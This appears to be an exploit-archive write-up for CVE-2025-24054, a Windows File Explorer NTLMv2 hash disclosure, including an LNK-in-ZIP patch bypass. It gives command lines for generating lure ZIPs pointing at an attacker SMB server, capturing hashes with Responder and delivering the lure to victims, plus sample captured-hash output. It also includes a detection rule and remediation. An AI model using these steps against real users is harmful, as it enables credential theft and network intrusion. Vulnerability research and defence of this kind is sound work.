Windows NTLM Hash Disclosure via File Explorer - CVE-2025-24054
by Untouchable17 · 2026-05-17
- Severity
- Medium
- CVE
- CVE-2025-24054
- Category
- binary
- Affected product
- Windows File Explorer (Windows Shell)
- Affected versions
- Windows 10, Windows 11, Windows Server — prior to March 2025 patch
- Disclosed
- 2026-05-17
- Patch status
- patched
Tags
References
Archive entry
intelseclab/poc-archiveMetadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Last Updated | 2025-11-24 |
| Author / Researcher | Untouchable17 |
| CVE / Advisory | CVE-2025-24054 |
| Category | binary |
| Severity | Medium |
| CVSS Score | 6.5 (CVSSv3) |
| Status | Patched |
| Tags | NTLM, NTLMv2, hash-disclosure, zero-click, Windows, File-Explorer, UNC, SMB, credential-theft, in-the-wild, state-sponsored |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Windows File Explorer (Windows Shell) |
| Versions Affected | Windows 10, Windows 11, Windows Server — prior to March 2025 patch |
| Language / Platform | Windows, Python 3.6+, PowerShell 5.1+ |
| Authentication Required | No |
| Network Access Required | Yes (attacker must operate a reachable SMB server to capture hashes) |
Summary
CVE-2025-24054 is a zero-click NTLMv2-SSP hash disclosure vulnerability in Windows File Explorer. When a user opens a ZIP archive containing a crafted .searchConnector-ms file, Windows Explorer automatically resolves an embedded UNC path during file preview, triggering an outbound SMB authentication attempt to an attacker-controlled server — leaking the victim’s NTLMv2 hash without any user interaction beyond opening the archive. The vulnerability was exploited in the wild since at least March 2025 by state-sponsored actors. Microsoft patched the initial vector, but the researcher also documents two subsequent patch bypasses (CVE-2025-50154 / CVE-2025-59214) using LNK files in ZIP archives. Related vulnerability: CVE-2025-24071.
Vulnerability Details
Root Cause
The fundamental security issue resides in Windows Shell’s automatic processing of embedded UNC paths within specific XML-based file formats (.searchConnector-ms, .library-ms) during preview operations. The simpleLocation/url element in a searchConnectorDescription XML document is silently resolved by the Windows Search Indexer and Explorer shell when the containing archive is opened. This processing occurs without user consent, triggering NTLM authentication to the UNC server and exposing the NTLMv2-SSP hash. The ZIP container additionally bypasses Mark-of-the-Web (MOTW) protections.
Attack Vector
Phase 1 (CVE-2025-24054 - original):
- Attacker generates a
.searchConnector-msXML payload with UNC path pointing to attacker SMB server. - Payload is packaged into a ZIP archive with a socially-engineered filename.
- Victim receives ZIP via email, download, or file share and opens it in Windows Explorer.
- Explorer automatically previews the
.searchConnector-msfile and resolves the UNC path. - Windows sends NTLMv2-SSP authentication to attacker’s SMB server; attacker captures the hash.
Phase 2 (Patch bypass - CVE-2025-50154 / CVE-2025-59214):
- After Microsoft’s initial patch, attacker creates a
.lnkshortcut file with UNC path inTargetPath. - LNK is packaged in ZIP; Windows Explorer fetches icon metadata and resolves the UNC path during ZIP preview.
- Hash leaks via the same NTLMv2-SSP mechanism.
Impact
Capture of the victim’s NTLMv2 hash, which can be used for:
- Offline password cracking (hashcat, john)
- NTLM relay attacks to authenticate to other services on the network without cracking
- Lateral movement and privilege escalation in Active Directory environments
Environment / Lab Setup
OS: Windows 10 / Windows 11 (unpatched, pre-March 2025)
Target: Windows File Explorer on victim host
Attacker: Linux/Windows with Responder or Impacket SMB server
Tools: Python 3.6+, colorama, Responder / impacket-smbserver
Setup Steps
| |
Proof of Concept
Step-by-Step Reproduction
Generate payload — Create ZIP containing
.searchConnector-mswith attacker UNC path.1 2 3python ntml-disclosure-poc.py 192.168.1.100 # Optional: custom output filename python ntml-disclosure-poc.py 192.168.1.100 -o lure_document.zipStart SMB listener — Capture incoming NTLMv2-SSP hash.
1responder -I eth0 -wDeliver payload — Send ZIP to victim via email, messaging platform, or file share.
Victim opens ZIP — Windows Explorer automatically triggers UNC resolution; NTLMv2 hash is captured on attacker server.
Patch bypass (LNK method) — For patched systems, use
patch_bypass.ps1:1.\patch_bypass.ps1 -IP 192.168.1.100 -Lure "Finance_Report_Q4" -KeepLnk
Exploit Code
See
ntml-disclosure-poc.py(Phase 1 - searchConnector method) andpatch_bypass.ps1(Phase 2 - LNK bypass) in this folder.
| |
Expected Output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir_1337
[*] COMPLETE Package: Project_20251123_175037.zip
[SMB] NTLMv2-SSP Client: 192.168.1.50
[SMB] NTLMv2-SSP Username: DOMAIN\victim
[SMB] NTLMv2-SSP Hash: victim::DOMAIN:...
Screenshots / Evidence
Detection & Indicators of Compromise
SIEM / IDS Rule (example):
alert tcp any any -> !$HOME_NET 445 (msg:"Outbound SMB - possible NTLM hash leak CVE-2025-24054";
flow:established,to_server; sid:9000101;)
Remediation
| Action | Detail |
|---|---|
| Patch | Apply Microsoft March 2025 cumulative update addressing CVE-2025-24054 |
| Workaround | Block outbound SMB (port 445) at perimeter firewall; disable NTLM authentication where possible |
| Config Hardening | Enable “Restrict NTLM: Outgoing NTLM traffic to remote servers” Group Policy; deploy SMB signing |
References
Notes
Repository implements two attack phases: the original CVE-2025-24054 vector (searchConnector-ms in ZIP) via ntml-disclosure-poc.py, and a patch bypass using LNK files in ZIP (CVE-2025-50154 / CVE-2025-59214) via patch_bypass.ps1. The Python PoC filename has a typo (ntml instead of ntlm) — preserved as-is from upstream. The patch bypass vector (LNK-in-ZIP) was active and unpatched at time of researcher publication. Requires attacker-controlled SMB server reachable from victim network — commonly used with Responder or Impacket.
Auto-ingested from https://github.com/Untouchable17/CVE-2025-24054 on 2026-05-17.
| |